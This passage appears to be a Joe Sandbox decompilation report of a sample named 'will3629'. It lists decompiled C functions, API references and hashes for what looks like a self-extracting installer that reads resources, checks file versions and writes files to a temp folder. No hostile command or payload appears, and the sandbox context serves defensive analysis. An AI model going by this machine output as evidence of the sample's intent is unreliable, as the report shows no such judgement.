                                                • Opcode ID: ce9d1451acbc69a1115aba88e89bef4808e48627f17d4c961b1b8efd7d6ebe86
                                                • Instruction ID: 6054f483f5dd3b28452e2a2866a02df24697ce9ef241ca83f9435eac3c67ddfb
                                                • Opcode Fuzzy Hash: ce9d1451acbc69a1115aba88e89bef4808e48627f17d4c961b1b8efd7d6ebe86
                                                • Instruction Fuzzy Hash: 6601F430A0410CABDB50EBA4DC49FFE7378EB65315F62029DF586A21C0DF709E8ACA51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                				void* _v8;
                                                				char* _v12;
                                                				intOrPtr _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				int _v28;
                                                				int _v32;
                                                				void* _v36;
                                                				int _v40;
                                                				void* _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				long _t68;
                                                				void* _t70;
                                                				void* _t73;
                                                				void* _t79;
                                                				void* _t83;
                                                				void* _t87;
                                                				void* _t88;
                                                				intOrPtr _t93;
                                                				intOrPtr _t97;
                                                				intOrPtr _t99;
                                                				int _t101;
                                                				void* _t103;
                                                				void* _t106;
                                                				void* _t109;
                                                				void* _t110;
                                                
                                                				_v12 = __edx;
                                                				_t99 = __ecx;
                                                				_t106 = 0;
                                                				_v16 = __ecx;
                                                				_t87 = 0;
                                                				_t103 = 0;
                                                				_v20 = 0;
                                                				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                					L19:
                                                					_t106 = 1;
                                                				} else {
                                                					_t62 = 0;
                                                					_v8 = 0;
                                                					while(1) {
                                                						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                						if(E00AC2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                							goto L20;
                                                						}
                                                						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                						_v28 = _t68;
                                                						if(_t68 == 0) {
                                                							_t99 = _v16;
                                                							_t70 = _v8 + _t99;
                                                							_t93 = _v24;
                                                							_t87 = _v20;
                                                							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                								goto L18;
                                                							}
                                                						} else {
                                                							_t103 = GlobalAlloc(0x42, _t68);
                                                							if(_t103 != 0) {
                                                								_t73 = GlobalLock(_t103);
                                                								_v36 = _t73;
                                                								if(_t73 != 0) {
                                                									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                										L15:
                                                										GlobalUnlock(_t103);
                                                										_t99 = _v16;
                                                										L18:
                                                										_t87 = _t87 + 1;
                                                										_t62 = _v8 + 0x3c;
                                                										_v20 = _t87;
                                                										_v8 = _v8 + 0x3c;
                                                										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                											continue;
                                                										} else {
                                                											goto L19;
                                                										}
                                                									} else {
                                                										_t79 = _v44;
                                                										_t88 = _t106;
                                                										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                										_t101 = _v28;
                                                										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                										_t97 = _v48;
                                                										_v36 = _t83;
                                                										_t109 = _t83;
                                                										do {
                                                											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00AC2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00AC2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                											_t109 = _t109 + 0x18;
                                                											_t88 = _t88 + 4;
                                                										} while (_t88 < 8);
                                                										_t87 = _v20;
                                                										_t106 = 0;
                                                										if(_v56 < 0 || _v64 > 0) {
                                                											if(_v52 < _t106 || _v60 > _t106) {
                                                												GlobalUnlock(_t103);
                                                											} else {
                                                												goto L15;
                                                											}
                                                										} else {
                                                											goto L15;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                				}
                                                				L20:
                                                				 *_a8 = _t87;
                                                				if(_t103 != 0) {
                                                					GlobalFree(_t103);
                                                				}
                                                				return _t106;
                                                			}

































                                                0x00ac28f1
                                                0x00ac28f4
                                                0x00ac28f7
                                                0x00ac28f9
                                                0x00ac28fc
                                                0x00ac28ff
                                                0x00ac2901
                                                0x00ac2907
                                                0x00ac2a62
                                                0x00ac2a64
                                                0x00ac290d
                                                0x00ac290d
                                                0x00ac290f
                                                0x00ac2912
                                                0x00ac2920
                                                0x00ac2937
                                                0x00000000
                                                0x00000000
                                                0x00ac2944
                                                0x00ac294a
                                                0x00ac294f
                                                0x00ac2a2f
                                                0x00ac2a32
                                                0x00ac2a34
                                                0x00ac2a37
                                                0x00ac2a41
                                                0x00000000
                                                0x00000000
                                                0x00ac2955
                                                0x00ac295e
                                                0x00ac2962
                                                0x00ac2969
                                                0x00ac296f
                                                0x00ac2974
                                                0x00ac298c
                                                0x00ac2a20
                                                0x00ac2a21
                                                0x00ac2a27
                                                0x00ac2a4c
                                                0x00ac2a4f
                                                0x00ac2a50
                                                0x00ac2a53
                                                0x00ac2a56
                                                0x00ac2a5c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac29b2
                                                0x00ac29b2
                                                0x00ac29b5
                                                0x00ac29bd
                                                0x00ac29c3
                                                0x00ac29cc
                                                0x00ac29d5
                                                0x00ac29d7
                                                0x00ac29da
                                                0x00ac29dd
                                                0x00ac29df
                                                0x00ac29ec
                                                0x00ac29f8
                                                0x00ac29fc
                                                0x00ac29ff
                                                0x00ac2a02
                                                0x00ac2a07
                                                0x00ac2a0a
                                                0x00ac2a0f
                                                0x00ac2a19
                                                0x00ac2a81
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac2a0f
                                                0x00ac298c
                                                0x00ac2974
                                                0x00ac2962
                                                0x00000000
                                                0x00ac294f
                                                0x00ac2912
                                                0x00ac2a65
                                                0x00ac2a68
                                                0x00ac2a6c
                                                0x00ac2a6f
                                                0x00ac2a6f
                                                0x00ac2a7d

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 00AC2A6F
                                                  • Part of subcall function 00AC2773: CharUpperA.USER32(C32E3DED,00000000,00000000,00000000), ref: 00AC27A8
                                                  • Part of subcall function 00AC2773: CharNextA.USER32(0000054D), ref: 00AC27B5
                                                  • Part of subcall function 00AC2773: CharNextA.USER32(00000000), ref: 00AC27BC
                                                  • Part of subcall function 00AC2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2829
                                                  • Part of subcall function 00AC2773: RegQueryValueExA.ADVAPI32(?,00AC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2852
                                                  • Part of subcall function 00AC2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2870
                                                  • Part of subcall function 00AC2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC28A0
                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00AC3938,?,?,?,?,-00000005), ref: 00AC2958
                                                • GlobalLock.KERNEL32 ref: 00AC2969
                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AC3938,?,?,?,?,-00000005,?), ref: 00AC2A21
                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00AC2A81
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                • String ID:
                                                • API String ID: 3949799724-0
                                                • Opcode ID: 44e858c18410ab2fe7e9b7a247d44ea57579d763840027548bd8dd4bc52dc848
                                                • Instruction ID: 4e407af654206864ca86809d41446c221f6dc3058f88f8d29e1914dfc59d9c68
                                                • Opcode Fuzzy Hash: 44e858c18410ab2fe7e9b7a247d44ea57579d763840027548bd8dd4bc52dc848
                                                • Instruction Fuzzy Hash: 57512835E00219EBCB21CF99C884FAEBBB5FF48744F16412EE905E3221DB319941DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 32%
                                                			E00AC4169(void* __eflags) {
                                                				int _t18;
                                                				void* _t21;
                                                
                                                				_t20 = E00AC468F("FINISHMSG", 0, 0);
                                                				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                				if(_t21 != 0) {
                                                					if(E00AC468F("FINISHMSG", _t21, _t20) != 0) {
                                                						if(lstrcmpA(_t21, "<None>") == 0) {
                                                							L7:
                                                							return LocalFree(_t21);
                                                						}
                                                						_push(0);
                                                						_push(0x40);
                                                						_push(0);
                                                						_push(_t21);
                                                						_t18 = 0x3e9;
                                                						L6:
                                                						E00AC44B9(0, _t18);
                                                						goto L7;
                                                					}
                                                					_push(0);
                                                					_push(0x10);
                                                					_push(0);
                                                					_push(0);
                                                					_t18 = 0x4b1;
                                                					goto L6;
                                                				}
                                                				return E00AC44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                			}





                                                0x00ac417d
                                                0x00ac418f
                                                0x00ac4193
                                                0x00ac41b7
                                                0x00ac41d3
                                                0x00ac41e6
                                                0x00000000
                                                0x00ac41e7
                                                0x00ac41d5
                                                0x00ac41d6
                                                0x00ac41d8
                                                0x00ac41d9
                                                0x00ac41da
                                                0x00ac41df
                                                0x00ac41e1
                                                0x00000000
                                                0x00ac41e1
                                                0x00ac41b9
                                                0x00ac41ba
                                                0x00ac41bc
                                                0x00ac41bd
                                                0x00ac41be
                                                0x00000000
                                                0x00ac41be
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
                                                  • Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
                                                  • Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
                                                  • Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
                                                  • Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
                                                  • Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
                                                  • Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF
                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00AC30B4), ref: 00AC4189
                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00AC30B4), ref: 00AC41E7
                                                  • Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
                                                  • Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                • String ID: <None>$FINISHMSG
                                                • API String ID: 3507850446-3091758298
                                                • Opcode ID: b709ff242c2d96b62c7223e9173bf55abc4cbdaaf83e37978fc23bbd76a0e4d7
                                                • Instruction ID: eb4707605475fef616c528cc74979309fb4f0505c80aff72b904a93ade3feeea
                                                • Opcode Fuzzy Hash: b709ff242c2d96b62c7223e9173bf55abc4cbdaaf83e37978fc23bbd76a0e4d7
                                                • Instruction Fuzzy Hash: F80121B13002183BF32417654DA6F7B218EDBD97D8F17012DB702E5280CE68CC02017D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00AC19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                				signed int _v8;
                                                				char _v520;
                                                				void* __esi;
                                                				signed int _t11;
                                                				void* _t14;
                                                				void* _t23;
                                                				void* _t27;
                                                				void* _t33;
                                                				struct HWND__* _t34;
                                                				signed int _t35;
                                                
                                                				_t33 = __edi;
                                                				_t27 = __ebx;
                                                				_t11 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t11 ^ _t35;
                                                				_t34 = _a4;
                                                				_t14 = _a8 - 0x110;
                                                				if(_t14 == 0) {
                                                					_t32 = GetDesktopWindow();
                                                					E00AC43D0(_t34, _t15);
                                                					_v520 = 0;
                                                					LoadStringA( *0xac9a3c, _a16,  &_v520, 0x200);
                                                					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                					MessageBeep(0xffffffff);
                                                					goto L6;
                                                				} else {
                                                					if(_t14 != 1) {
                                                						L4:
                                                						_t23 = 0;
                                                					} else {
                                                						_t32 = _a12;
                                                						if(_t32 - 0x83d > 1) {
                                                							goto L4;
                                                						} else {
                                                							EndDialog(_t34, _t32);
                                                							L6:
                                                							_t23 = 1;
                                                						}
                                                					}
                                                				}
                                                				return E00AC6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                			}













                                                0x00ac19e0
                                                0x00ac19e0
                                                0x00ac19eb
                                                0x00ac19f2
                                                0x00ac19f9
                                                0x00ac19fc
                                                0x00ac1a01
                                                0x00ac1a2a
                                                0x00ac1a2e
                                                0x00ac1a3e
                                                0x00ac1a4f
                                                0x00ac1a62
                                                0x00ac1a6a
                                                0x00000000
                                                0x00ac1a03
                                                0x00ac1a06
                                                0x00ac1a20
                                                0x00ac1a20
                                                0x00ac1a08
                                                0x00ac1a08
                                                0x00ac1a14
                                                0x00000000
                                                0x00ac1a16
                                                0x00ac1a18
                                                0x00ac1a70
                                                0x00ac1a72
                                                0x00ac1a72
                                                0x00ac1a14
                                                0x00ac1a06
                                                0x00ac1a81

                                                APIs
                                                • EndDialog.USER32(?,?), ref: 00AC1A18
                                                • GetDesktopWindow.USER32 ref: 00AC1A24
                                                • LoadStringA.USER32(?,?,00000200), ref: 00AC1A4F
                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00AC1A62
                                                • MessageBeep.USER32(000000FF), ref: 00AC1A6A
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                • String ID:
                                                • API String ID: 1273765764-0
                                                • Opcode ID: 1ceb9cb2a352faeaef645a0390878d76f5d1338a4495e6d983e47840a6df36e6
                                                • Instruction ID: d201afdff970c59c45833633b6d56bc40a581caa9a262ccebf6468ed8adfef09
                                                • Opcode Fuzzy Hash: 1ceb9cb2a352faeaef645a0390878d76f5d1338a4495e6d983e47840a6df36e6
                                                • Instruction Fuzzy Hash: 8211A53160110DAFDB10EFA8DE08FBE77B8FF59344F128258F52696191DA349E42CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC7155() {
                                                				void* _v8;
                                                				struct _FILETIME _v16;
                                                				signed int _v20;
                                                				union _LARGE_INTEGER _v24;
                                                				signed int _t23;
                                                				signed int _t36;
                                                				signed int _t37;
                                                				signed int _t39;
                                                
                                                				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                				_t23 =  *0xac8004; // 0xc32e3ded
                                                				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                					GetSystemTimeAsFileTime( &_v16);
                                                					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                					_v8 = _v8 ^ GetCurrentProcessId();
                                                					_v8 = _v8 ^ GetCurrentThreadId();
                                                					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                					QueryPerformanceCounter( &_v24);
                                                					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                					_t39 = _t36;
                                                					if(_t36 == 0xbb40e64e || ( *0xac8004 & 0xffff0000) == 0) {
                                                						_t36 = 0xbb40e64f;
                                                						_t39 = 0xbb40e64f;
                                                					}
                                                					 *0xac8004 = _t39;
                                                				}
                                                				_t37 =  !_t36;
                                                				 *0xac8008 = _t37;
                                                				return _t37;
                                                			}











                                                0x00ac715d
                                                0x00ac7161
                                                0x00ac7165
                                                0x00ac7178
                                                0x00ac7182
                                                0x00ac718e
                                                0x00ac7197
                                                0x00ac71a0
                                                0x00ac71b1
                                                0x00ac71b8
                                                0x00ac71c4
                                                0x00ac71c7
                                                0x00ac71cb
                                                0x00ac71d5
                                                0x00ac71da
                                                0x00ac71da
                                                0x00ac71dc
                                                0x00ac71dc
                                                0x00ac71e2
                                                0x00ac71e5
                                                0x00ac71ee

                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00AC7182
                                                • GetCurrentProcessId.KERNEL32 ref: 00AC7191
                                                • GetCurrentThreadId.KERNEL32 ref: 00AC719A
                                                • GetTickCount.KERNEL32 ref: 00AC71A3
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00AC71B8
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                • String ID:
                                                • API String ID: 1445889803-0
                                                • Opcode ID: 66275892ac91dd85f1947ae61ddd6d8073cb8ccd33d06c7b34829b473627c3f4
                                                • Instruction ID: bb32bb97408fae05a0b30258773cdb65bd7d3d749c4a35a2ae2c15b31274dab3
                                                • Opcode Fuzzy Hash: 66275892ac91dd85f1947ae61ddd6d8073cb8ccd33d06c7b34829b473627c3f4
                                                • Instruction Fuzzy Hash: E4112875D01208DBCB10DFF8DA48AAEB7F4FB18314F664A59D806E7210EB349A058B41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E00AC63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                				signed int _v8;
                                                				char _v268;
                                                				long _v272;
                                                				void* _v276;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t15;
                                                				long _t28;
                                                				struct _OVERLAPPED* _t37;
                                                				void* _t39;
                                                				signed int _t40;
                                                
                                                				_t15 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t15 ^ _t40;
                                                				_v272 = _v272 & 0x00000000;
                                                				_push(__ecx);
                                                				_v276 = _a16;
                                                				_t37 = 1;
                                                				E00AC1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                				E00AC658A( &_v268, 0x104, _a12);
                                                				_t28 = 0;
                                                				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                				if(_t39 != 0xffffffff) {
                                                					_t28 = _a4;
                                                					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                						 *0xac9124 = 0x80070052;
                                                						_t37 = 0;
                                                					}
                                                					CloseHandle(_t39);
                                                				} else {
                                                					 *0xac9124 = 0x80070052;
                                                					_t37 = 0;
                                                				}
                                                				return E00AC6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                			}















                                                0x00ac63cb
                                                0x00ac63d2
                                                0x00ac63d8
                                                0x00ac63ea
                                                0x00ac63f3
                                                0x00ac6401
                                                0x00ac6402
                                                0x00ac6410
                                                0x00ac6415
                                                0x00ac6433
                                                0x00ac6438
                                                0x00ac6449
                                                0x00ac6463
                                                0x00ac646d
                                                0x00ac6477
                                                0x00ac6477
                                                0x00ac647a
                                                0x00ac643a
                                                0x00ac643a
                                                0x00ac6444
                                                0x00ac6444
                                                0x00ac6492

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC642D
                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC645B
                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00AC647A
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC63EB
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                • API String ID: 1065093856-183442868
                                                • Opcode ID: 3df9f8de7600ea70f5ea4c3c112d5e0ddf20e7851a88a101bb21aca57fbede8a
                                                • Instruction ID: d23ef14f52c7ddc668b5826e1413ed3c699bdca9424e181a45b71c71a16c9dfc
                                                • Opcode Fuzzy Hash: 3df9f8de7600ea70f5ea4c3c112d5e0ddf20e7851a88a101bb21aca57fbede8a
                                                • Instruction Fuzzy Hash: 5A2102B1A0021CABDB10DF65DD89FEB73B8EB49314F0102A9F595A3280CBB05D858FA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC47E0(intOrPtr* __ecx) {
                                                				intOrPtr _t6;
                                                				intOrPtr _t9;
                                                				void* _t11;
                                                				void* _t19;
                                                				intOrPtr* _t22;
                                                				void _t24;
                                                				struct HWND__* _t25;
                                                				struct HWND__* _t26;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                				intOrPtr* _t33;
                                                				void* _t34;
                                                
                                                				_t33 = __ecx;
                                                				_t34 = LocalAlloc(0x40, 8);
                                                				if(_t34 != 0) {
                                                					_t22 = _t33;
                                                					_t27 = _t22 + 1;
                                                					do {
                                                						_t6 =  *_t22;
                                                						_t22 = _t22 + 1;
                                                					} while (_t6 != 0);
                                                					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                					 *_t34 = _t24;
                                                					if(_t24 != 0) {
                                                						_t28 = _t33;
                                                						_t19 = _t28 + 1;
                                                						do {
                                                							_t9 =  *_t28;
                                                							_t28 = _t28 + 1;
                                                						} while (_t9 != 0);
                                                						E00AC1680(_t24, _t28 - _t19 + 1, _t33);
                                                						_t11 =  *0xac91e0; // 0x2eb7b60
                                                						 *(_t34 + 4) = _t11;
                                                						 *0xac91e0 = _t34;
                                                						return 1;
                                                					}
                                                					_t25 =  *0xac8584; // 0x0
                                                					E00AC44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                					LocalFree(_t34);
                                                					L2:
                                                					return 0;
                                                				}
                                                				_t26 =  *0xac8584; // 0x0
                                                				E00AC44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                				goto L2;
                                                			}















                                                0x00ac47e8
                                                0x00ac47f0
                                                0x00ac47f4
                                                0x00ac480f
                                                0x00ac4811
                                                0x00ac4814
                                                0x00ac4814
                                                0x00ac4816
                                                0x00ac4817
                                                0x00ac4829
                                                0x00ac482b
                                                0x00ac482f
                                                0x00ac484f
                                                0x00ac4852
                                                0x00ac4855
                                                0x00ac4855
                                                0x00ac4857
                                                0x00ac4858
                                                0x00ac4860
                                                0x00ac4865
                                                0x00ac486a
                                                0x00ac486f
                                                0x00000000
                                                0x00ac4876
                                                0x00ac4831
                                                0x00ac4841
                                                0x00ac4847
                                                0x00ac480b
                                                0x00000000
                                                0x00ac480b
                                                0x00ac47f6
                                                0x00ac4806
                                                0x00000000

                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00AC4E6F), ref: 00AC47EA
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00AC4823
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00AC4847
                                                  • Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
                                                  • Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC4851
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                • API String ID: 359063898-183442868
                                                • Opcode ID: 8824e99918c5639cd14411d1873328490f17aa1cb78162ada5919dd4ae765b58
                                                • Instruction ID: 18b5931790568682358bf7db12d44fac129f2455ca3d829b68e38d1c57196e6f
                                                • Opcode Fuzzy Hash: 8824e99918c5639cd14411d1873328490f17aa1cb78162ada5919dd4ae765b58
                                                • Instruction Fuzzy Hash: F9112975604641AFEB14CF749C28F733B9AEB89300F16851DF98297341DA358C078764
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00AC3680(void* __ecx) {
                                                				void* _v8;
                                                				struct tagMSG _v36;
                                                				int _t8;
                                                				struct HWND__* _t16;
                                                
                                                				_v8 = __ecx;
                                                				_t16 = 0;
                                                				while(1) {
                                                					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                					if(_t8 == 0) {
                                                						break;
                                                					}
